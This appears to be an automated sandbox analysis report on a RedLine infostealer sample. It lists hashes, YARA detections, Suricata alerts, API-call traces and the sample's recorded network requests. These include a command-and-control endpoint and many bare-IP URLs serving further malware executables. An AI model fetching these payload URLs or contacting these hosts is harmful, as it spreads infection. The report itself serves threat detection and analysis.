Summary | ZeroBOX

66f0297e9c3eb_15.exe

RedLine Infostealer RedLine stealer .NET framework(MSIL) Malicious Library UPX PWS AntiDebug PE File OS Processor Check PE32 .NET EXE AntiVM
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 25, 2024, 10:45 a.m. Sept. 25, 2024, 11:08 a.m.
Size 10.5MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 38ef48a2e156067f1770497335e92066
SHA256 88efb8b6990e916e7590c2bd3f734f390f7c3d7b517a5fdc1baba0a2f6fbd54c
CRC32 8B426A03
ssdeep 196608:C1CmHo7PKWdP/7qEimwGZRKaP8xC3239GeFdJJMGHPP/CPZ5za/+qKcDxNY5fv7k:C1CmHOKWDqzKTKakxC323MeFV/m5zQAI
PDB Path vitosoft.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

IP Address Status Action
104.192.140.26 Active Moloch
104.237.62.213 Active Moloch
104.26.4.15 Active Moloch
104.26.9.59 Active Moloch
108.61.198.52 Active Moloch
147.45.44.104 Active Moloch
147.45.45.69 Active Moloch
164.124.101.2 Active Moloch
176.111.174.109 Active Moloch
176.113.115.33 Active Moloch
185.215.113.37 Active Moloch
194.116.215.195 Active Moloch
34.117.59.81 Active Moloch
45.91.200.135 Active Moloch
80.66.75.114 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49169 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 104.237.62.213:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.237.62.213:443 -> 192.168.56.103:49168 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2054168 ET INFO External IP Lookup Domain in DNS Lookup (ipinfo .io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 176.113.115.33:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49171 -> 104.26.4.15:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49172 -> 104.26.9.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49172 -> 104.26.9.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.103:49183 -> 104.192.140.26:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49187 -> 104.192.140.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 104.192.140.26:80 -> 192.168.56.103:49183 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 176.113.115.33:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 194.116.215.195:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 185.215.113.37:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2400022 ET DROP Spamhaus DROP Listed Traffic Inbound group 23 Misc Attack
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49182 -> 185.215.113.37:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2014819 ET INFO Packed Executable Download Misc activity
TCP 194.116.215.195:80 -> 192.168.56.103:49174 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 194.116.215.195:80 -> 192.168.56.103:49174 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 104.192.140.26:80 -> 192.168.56.103:49185 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 147.45.45.69:80 -> 192.168.56.103:49176 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.45.69:80 -> 192.168.56.103:49176 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.37:80 -> 192.168.56.103:49182 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.111.174.109:80 -> 192.168.56.103:49181 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2400007 ET DROP Spamhaus DROP Listed Traffic Inbound group 8 Misc Attack
TCP 192.168.56.103:49184 -> 104.192.140.26:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 176.113.115.33:80 -> 192.168.56.103:49179 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 104.192.140.26:80 -> 192.168.56.103:49184 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2014819 ET INFO Packed Executable Download Misc activity
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 104.192.140.26:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 80.66.75.114:80 -> 192.168.56.103:49175 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49178 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49178 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49178 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49180 -> 147.45.44.104:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.44.104:80 -> 192.168.56.103:49180 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 147.45.45.69:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.45.45.69:80 -> 192.168.56.103:49177 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49167 -> 104.237.62.213:443 2047703 ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI Misc activity
TCP 192.168.56.103:49169 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49171
104.26.4.15:443
C=US, O=Google Trust Services, CN=WR1 CN=db-ip.com e0:87:2e:81:a3:0e:fe:55:82:41:57:b8:ff:b2:84:42:af:47:01:7c
TLSv1
192.168.56.103:49172
104.26.9.59:443
C=US, O=Google Trust Services, CN=WR1 CN=myip.com b3:80:cf:15:df:f5:53:6f:d4:e4:88:68:de:87:c0:e1:f8:3b:2c:02

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
pdb_path vitosoft.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .sdata
resource name DATAFILE
suspicious_features Connection to IP address suspicious_request GET http://45.91.200.135/api/wp-ping.php
suspicious_features POST method with no referer header, Connection to IP address suspicious_request POST http://45.91.200.135/api/wp-admin.php
suspicious_features Connection to IP address suspicious_request HEAD http://194.116.215.195/File.exe
suspicious_features Connection to IP address suspicious_request HEAD http://80.66.75.114/dl?name=inte
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/sdsdhggf.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/vdcsb.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/revada/66f3128883969_crypted.exe#1
suspicious_features Connection to IP address suspicious_request HEAD http://176.113.115.33/thebig/noode.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
suspicious_features Connection to IP address suspicious_request HEAD http://176.111.174.109/kurwa
suspicious_features Connection to IP address suspicious_request HEAD http://185.215.113.37/vera/nate.exe
suspicious_features Connection to IP address suspicious_request GET http://176.111.174.109/kurwa
suspicious_features Connection to IP address suspicious_request GET http://176.113.115.33/thebig/noode.exe
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.37/vera/nate.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/sdsdhggf.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/vdcsb.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
suspicious_features Connection to IP address suspicious_request GET http://194.116.215.195/File.exe
suspicious_features Connection to IP address suspicious_request GET http://80.66.75.114/dl?name=inte
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/revada/66f3128883969_crypted.exe#1
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
suspicious_features Connection to IP address suspicious_request HEAD http://147.45.45.69/vdcsnjdh15.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.45.69/vdcsnjdh15.exe
suspicious_features Connection to IP address suspicious_request GET http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET http://45.91.200.135/api/wp-ping.php
request POST http://45.91.200.135/api/wp-admin.php
request HEAD http://194.116.215.195/File.exe
request HEAD http://80.66.75.114/dl?name=inte
request HEAD http://147.45.45.69/sdsdhggf.exe
request HEAD http://147.45.45.69/vdcsb.exe
request HEAD http://147.45.44.104/revada/66f3128883969_crypted.exe#1
request HEAD http://176.113.115.33/thebig/noode.exe
request HEAD http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
request HEAD http://176.111.174.109/kurwa
request HEAD http://185.215.113.37/vera/nate.exe
request GET http://176.111.174.109/kurwa
request GET http://176.113.115.33/thebig/noode.exe
request GET http://185.215.113.37/vera/nate.exe
request GET http://147.45.45.69/sdsdhggf.exe
request GET http://147.45.45.69/vdcsb.exe
request HEAD http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
request HEAD http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET http://194.116.215.195/File.exe
request GET http://80.66.75.114/dl?name=inte
request HEAD http://147.45.44.104/lopsa/66ea645129e6a_jacobs.exe
request GET http://147.45.44.104/yuop/66f32080436ad_deepweb.exe#deep
request HEAD http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
request GET http://147.45.44.104/revada/66f3128883969_crypted.exe#1
request GET http://240922164748184.tyr.zont16.com/f/fikbam0922184.exe
request GET http://147.45.44.104/malesa/66f31d151f82e_lyla34.exe
request HEAD http://147.45.45.69/vdcsnjdh15.exe
request GET http://147.45.45.69/vdcsnjdh15.exe
request GET http://147.45.44.104/lopsa/66f18e5598f87_kaloa.exe
request GET https://db-ip.com/demo/home.php?s=
request GET https://api.myip.com/
request POST http://45.91.200.135/api/wp-admin.php
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00640000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00830000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 851968
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02900000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02990000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00462000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00820000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0049b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00497000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00495000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0046a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00821000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00486000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0048a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00487000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0047a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1740
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73db4000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0082f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e76000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e77000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04e7b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05896000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05897000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1740
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05898000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x747a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74751000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x758f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x756e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74731000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74721000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74691000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74341000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76971000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74fc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74331000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742f1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74251000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f91000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghpilmjholiicaobfjdkefcogmgaabif
